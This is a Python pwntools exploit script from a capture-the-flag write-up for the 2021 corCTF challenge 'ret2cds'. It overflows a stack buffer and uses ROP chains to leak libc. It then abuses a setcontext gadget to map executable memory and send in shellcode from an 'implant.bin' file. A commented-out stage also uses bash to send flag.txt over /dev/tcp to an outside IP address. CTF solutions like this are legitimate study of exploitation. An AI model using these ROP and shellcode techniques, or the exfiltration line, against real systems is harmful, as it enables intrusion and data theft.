writeups/2021/corctf/ret2cds/exploit/exploit.py

from pwn import *

import os

context.arch = 'amd64'

def run():
    elf = ELF("../challenge/chall/ret2cds")
    rop = ROP(elf)
    rop.write(1, elf.got['write'])
    print(rop.dump())

    libc = ELF("../challenge/chall/libc.so.6")
    print(hex(libc.symbols['write']))

    # r = process(["./ld-2.31.so", "./ret2cds"], env={"LD_PRELOAD": os.getcwd() + "/libc.so.6"})
    # gdb.attach(r)
    # r = remote("localhost", 1337)
    r = remote("ret2cds.be.ax", 34485)
    try:
        r.recvuntil("warden: ")

        r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a))
        print(r.recvline())
        print(r.recvline())
        leak = r.recvline()[1:8]
        leak = u64(leak.ljust(8, b'\x00'))
        print(hex(leak))

        libc_base = leak - libc.symbols['write']
        print(hex(libc_base))

        libc.address = libc_base

        libc_rop = ROP(libc)
        libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0)
        libc_rop.read(0, 0x133713370000, 0x10000)
        print(libc_rop.dump())
        print(libc_rop.chain())

        # abuse setcontext lol
        # setcontext is always a good function to look for cool gadgets in
        # loaded as 0x0
        # 001581e1 4c 8b 4a 30     MOV        R9,qword ptr [RDX + 0x30]
        # 001581e5 48 8b 92        MOV        RDX,qword ptr [RDX + 0x88]
        #          88 00 00 00
        # 001581ec 31 c0           XOR        EAX,EAX
        # 001581ee c3              RET
        fucky_r9_gadget = p64(0x581e1 + libc_base)
        # load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets
        pre_rop = ROP(libc)
        pre_rop.rdx = 0x402008 - 0x30

        r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000))

        os.system("make")
        with open("implant.bin", "rb") as f:
            shellcode = f.read()
        shellcode += b"\x00" * (0x10000 - len(shellcode))

        r.send(shellcode)

        # stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {}))

        r.interactive()
    finally:
        r.close()

if __name__ == "__main__":
    run()